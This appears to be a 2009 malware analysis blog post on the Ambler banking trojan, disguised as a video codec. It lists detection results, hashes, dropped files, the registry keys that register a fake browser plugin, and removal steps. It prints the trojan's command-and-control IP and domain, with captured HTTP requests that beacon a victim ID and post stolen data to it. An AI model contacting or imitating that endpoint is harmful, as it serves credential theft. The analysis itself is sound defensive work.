Trojan-Dropper.Win32.Ambler

Recently a user has submitted a suspicious file, he informed us that he downloaded the files from a website that has served the file as a video codec. Below there is the report of the virus scaner:

Report Generated: 18.3.2009 at 16.34.15 (GMT 1)
File Name: setup_exe
File Size: 63 KB
MD5 Hash: A11E0E5389C93738D793E850C8AAA1C1
SHA1 Hash: FB87D25EB2AB42392009809A2369F42618D3DDD1
Detection Rate: 7 on 24 (29,16 %)
Status: INFECTED

Antivirus Sig version Engine Version Result
a-squared 18/03/2009 4.0.0.32 Trojan-Dropper.Win32.Ambler!IK
Avira AntiVir 7.1.2.187 8.1.2.12 TR/Banker.Banker.aflq
Avast 090317-0 4.8.1229 –
AVG 270.11.18/2009 8.0.0.0 –
BitDefender 18/03/2009 7.0.0.2555 –
ClamAV 18/03/2009 0.93.1.0 –
Comodo 1066 3.8 –
Dr.Web 18/03/2009 5.0 –
Ewido 18/03/2009 4.0.0.2 –
F-PROT 6 20090317 4.4.4.56 –
G DATA 19.3655 2.0.7309.847 –
IkarusT3 18/03/2009 1001044 Trojan-Dropper.Win32.Ambler
Kaspersky 18/03/2009 8.0.0.357 –
McAfee 18/03/2009 5.1.0.0 PWS-Banker trojan
Malware Hash Registry 18/03/2009 N/A –
NOD32 v3 3945 3.0.677 Win32/Spy.Ambler
Norman 2009/03/17 5.92.08 Trojan W32/Malware.FZKP
Panda 07/02/2009 9.5.1.00 –
QuickHeal 18 March, 2009 10.0 –
Solo Antivirus 18/03/2009 8.0 –
Sophos 18/03/2009 4.32.0 Troj/Spy-BV
TrendMicro 901(590100) 1.1-1001 –
VBA32 18/03/2009 3.12.0.300 –
VirusBuster 10.102.13 1.4.3 –

After the execution of the malicious file have been copied two files in the system32 folder:

1
2
C:\WINDOWS\system32\wh
C:\WINDOWS\system32\kmsvc32.dll

The file kmsvc32.dll is classified as a spy tool:

a-squared 18/03/2009 4.0.0.32 Trojan-PWS.Win32.Agent!IK
AVG 270.11.18/2009 8.0.0.0 PSW.Generic7.TP
NOD32 v3 3945 3.0.677 Win32/Spy.Ambler.M
Norman 2009/03/17 5.92.08 Backdoor W32/Smalldoor.DSTB

The malware modified the registry by adding these keys:

1
2
3
4
5
HKCR\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}\Google plugin
HKCR\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}\InprocServer32\kmsvc32.dll
HKLM\SOFTWARE\Classes\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}\Google plugin
HKLM\SOFTWARE\Classes\CLSID\{684EE1DB-CD52-4ca9-9CCF-93D5F6B419BA}\
InprocServer32\kmsvc32.dll

Now, immediately after I have opened Internet Explorer, the malware started to send and receive data with this IP:

1
85.17.209.45 (e-point.com.ua)

Internet traffic:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
GET /admin/cd.php?userid=-- HTTP/1.1
User-Agent: AS
Host: e-point.com.ua
Cache-Control: no-cache
HTTP/1.1 200 OK
 
POST /admin/dan.php HTTP/1.1
Referer: SAS
Content-Type: application/x-www-form-urlencoded
User-Agent: AE
Host: e-point.com.ua
Content-Length: 30
Cache-Control: no-cache
 
GET /admin/cd.php?userid=1190928_11344_24235789 HTTP/1.1
User-Agent: AS
Host: e-point.com.ua
Cache-Control: no-cache

Note that the User Agent is always set to AS or AE. After, we found new files in the folder of Temporary Internet Files:

Screenshot of files

New files have been copied also in system32 folder:

1
2
3
4
5
6
7
C:\WINDOWS\system32\fiod.dll
C:\WINDOWS\system32\bb1.dat
C:\WINDOWS\system32\cmds.txt
C:\WINDOWS\system32\cs.dat
C:\WINDOWS\system32\fiod.dll
C:\WINDOWS\system32\ps1.dat
C:\WINDOWS\system32\rc.dat

How to remove Trojan-Dropper.Win32.Ambler ?

1) Unregister the dll named kmsvc32.dll
2) Delete all created files
3) Delete all created registry keys
4) Restart the PC

Scan you system with NoVirusThanks Malware Remover.

Random Posts

Previous Posts